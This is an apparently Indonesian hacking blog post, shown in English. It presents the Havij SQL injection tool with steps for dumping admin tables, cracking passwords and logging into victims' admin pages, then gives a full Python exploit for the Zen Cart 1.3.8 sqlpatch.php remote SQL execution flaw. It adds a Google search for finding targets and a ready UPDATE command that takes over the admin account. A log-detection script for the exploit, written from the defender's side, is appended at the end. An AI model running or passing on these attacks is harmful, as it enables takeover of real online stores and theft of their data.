Havij 1.06 – Advanced SQL Injection Tool

Havij
-----
Version 1.06
Copyright © 2009
By r3dm0v3
http://r3dm0v3.persianblog.ir
r3dm0v3[4t]yahoo[.]com
Please tell me your offers and report bugs.
Check for updates!

Licence
-------
This program is free software. I hope it will be useful for you.
This software is provided “as is” without warranties.
Feel free to share and distribute it anywhere but please keep the files original!

What’s New?
-----------
-Oracle database
-MsAccess database
-Find Admin
-Proxy support
-Filtering enabled
-update/delete/insert
-Group_concat for mysql
-New look
-User agent header
-Load cookie from page
-Analyze method made better (specially for mysql)
-Many bugs fixed.

Features
--------
Data Bases: MsSQL 2000/2005 with error, MsSQL 2000/2005 no error, MySQL, Oracle, MsAccess
Find admin page
Getting Information
Getting Tables, Columns, Data
Command Execution (mssql only)
Reading Files (mysql only)
insert/update/delete data
Proxy support
Guessing tables and columns in mysql<5
Fast getting tables and columns for mysql.
Checking different injection syntaxes.
Changing http headers
Bypass illegal union.
Avoid using strings.

How to use:

1. Enter the target site in the Target field, then click "Analyze".
2. Wait until the scanning process finishes; it will show the IP, web server, DB type, etc.
3. After that, if you are lucky, you will get a hole in the site that can be injected.
4. On the "Tables" tab, click "Get Tables" and wait again until the process finishes; the names of the tables in the database will then appear.
5. When that is done, tick the tables related to ADMIN, for example "Users", "Account", "Admin", etc.; adjust as needed.
6. After that, click "Get Columns" and wait until the process finishes; the columns in those tables will then appear, for example "password", "username", "user_id", etc.; adjust as needed.
7. The important stage is getting the data in those columns: tick one of the columns, then click "Get Data" and wait for the process; you will then see data such as user IDs, passwords (usually MD5), etc.
8. Once you have the data, if for example the password is in MD5 form, click the MD5 tab (v1.08) to crack it.
9. The last step is to click the "Find Admin" tab to look for the admin page of your target site; if the process succeeds, a URL leading to the admin page will come up, then Go to URL.
10. Once the admin page is open, just enter the admin user together with the password obtained earlier, log in, and hopefully it works.

Download Link :

http://www.4shared.com/file/258231797/79214c44/Havij_108.html

Bugs Zen Cart

Assalamualaikum

Just read on.

Open Google and type: powered by zen cart ™

Once that is done, here is the Python script:

#!/usr/bin/python

#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
#
# BlackH :)
#

#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
#   DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
#   DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
   global a, b
   for param in sys.argv:
      if(param == '-'+name): return str(sys.argv[b+1])
      b = b + 1
   if(need):
      print '\n#error', "-"+name, 'parameter required'
      exit(1)

if (len(sys.argv) < 2):
   print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
========================================================================
|                  BlackH <Bl4ck.H@gmail.com>                          |
========================================================================
|                                                                      |
| $system> python """+sys.argv[0]+""" -url <url>                                |
| Param: <url>      ex: http://victim.com/site (no slash)              |
|                                                                      |
| Note: blind "injection"                                              |
========================================================================
   """
   exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:
   cmd = raw_input('sql@jah$ ')
   if (cmd == "exit"): exit(1)
   req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
   if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
      print '>> success (', cmd, ")"
   else:
      print '>> failed, be sure to end with ; (', cmd, ")"

Save that Python script as zen.py.

Before that, install Python on your computer; if you don't have it yet, download it from: http://www.python.org/ftp/python/2.5/python-2.5.msi

Once that is done, open cmd.
For example, if you put zen.py on the desktop, point cmd to the desktop first.

Then type: zen.py -url http://webkorban.com
Example: zen.py -url http://customizthat.com/2010/admin/ <-- Enter
After that, the prompt sql@jah$ will appear.
When that prompt appears, enter the command: UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; then press Enter.

If it succeeds, something like this will appear:

>> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

Example screenshots: [images: Bugs Zen Cart]

Once it has succeeded, just add /admin/ to the target URL.

If it succeeds, the username and password are always adminz : wew

That's all, and thank you.

If it works, this message appears:

>> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.
com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$

If it fails, this message appears:

>> failed, be sure to end with ; ( UPDATE admin SET admin_name='adminz', admin_e
mail='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHE
RE admin_id='1';

Or this:

Traceback (most recent call last):
 File "C:\Documents and Settings\Toshiba\Desktop\zen.py", line 53, in
 if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
 File "C:\Python25\lib\urllib2.py", line 121, in urlopen
 return _opener.open(url, data)
 File "C:\Python25\lib\urllib2.py", line 374, in open
 response = self._open(req, data)
 File "C:\Python25\lib\urllib2.py", line 392, in _open
 '_open', req)
 File "C:\Python25\lib\urllib2.py", line 353, in _call_chain
 result = func(*args)
 File "C:\Python25\lib\urllib2.py", line 1101, in http_open
 return self.do_open(httplib.HTTPConnection, req)
 File "C:\Python25\lib\urllib2.py", line 1076, in do_open
 raise URLError(err)
urllib2.URLError: 

By : Ichito Bandito
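
A log check for the request shape the script above sends, namely a .php script path with /password_forgotten.php appended (its "trick" value), written from the defender's side. This is an added example, not part of the original post; it assumes Combined Log Format access logs, and the sample lines, IP addresses, paths and severity labels are constructed.

```python
import re
from urllib.parse import urlsplit, unquote

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b')

# A .php script followed by extra path info ending in password_forgotten.php,
# e.g. /admin/sqlpatch.php/password_forgotten.php
SUFFIX_RE = re.compile(
    r'/(?P<script>[^/]+\.php)(?:/[^/]*)*/password_forgotten\.php$', re.I)

def classify(line):
    """Return a finding dict for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode %xx escapes and collapse repeated slashes before matching.
    path = re.sub(r'/{2,}', '/', unquote(urlsplit(m['target']).path))
    hit = SUFFIX_RE.search(path)
    if not hit:
        return None
    script = hit['script'].lower()
    # Assumed triage rule: a POST to sqlpatch.php answered with 2xx ranks highest.
    executed = (script == 'sqlpatch.php' and m['method'] == 'POST'
                and m['status'].startswith('2'))
    return {'ip': m['ip'], 'script': script, 'status': int(m['status']),
            'severity': 'high' if executed else 'medium'}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2010:10:01:22 +0700] "POST /shop/admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1" 200 5120',
    '198.51.100.4 - - [12/Mar/2010:10:02:01 +0700] "GET /shop/admin/password_forgotten.php HTTP/1.1" 200 2301',
    '203.0.113.7 - - [12/Mar/2010:10:02:40 +0700] "GET /shop/admin/customers.php/password%5Fforgotten.php HTTP/1.1" 200 9980',
    '198.51.100.9 - - [12/Mar/2010:10:03:15 +0700] "POST /shop/admin/sqlpatch.php?action=execute HTTP/1.1" 302 0',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The plain password_forgotten.php request and the redirected sqlpatch.php request are not flagged; only paths where another script name precedes the suffix are.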